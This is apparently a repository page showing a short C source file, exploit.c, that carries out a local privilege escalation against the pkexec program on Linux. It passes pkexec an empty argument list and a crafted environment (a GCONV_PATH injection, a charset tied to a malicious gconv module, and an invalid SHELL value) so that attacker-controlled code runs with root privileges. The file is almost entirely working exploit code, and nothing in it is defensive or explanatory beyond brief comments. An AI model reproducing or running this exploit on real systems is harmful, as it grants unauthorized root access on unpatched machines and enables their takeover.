/
exploit.c
26 lines (21 loc) · 848 Bytes
/
exploit.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#include <unistd.h>
#include <stdio.h>
int main()
{
/* The argv and environment passed to pkexec, the basis of this
* exploit */
char *argv[] = {NULL};
char *envp[] = {
"gconv", /* path containing malicious gconv config/shared obj */
"PATH=GCONV_PATH=.", /* Environment variable to be injected */
"CHARSET=ZT", /* Charset defined in malicious gconv config */
"SHELL=fakeshell", /* Invalid shell value, triggers error to be printed, resulting in charset conversion */
"GIO_USE_VFS=", /* GIO_USE_VFS must be unset on versions of pkexec that set it. */
NULL};
fprintf(stderr, "Running exploit...\n");
/* Run pkexec! */
int ret = execve("/usr/bin/pkexec", argv, envp);
if (ret)
perror("pkexec");
return -1;
}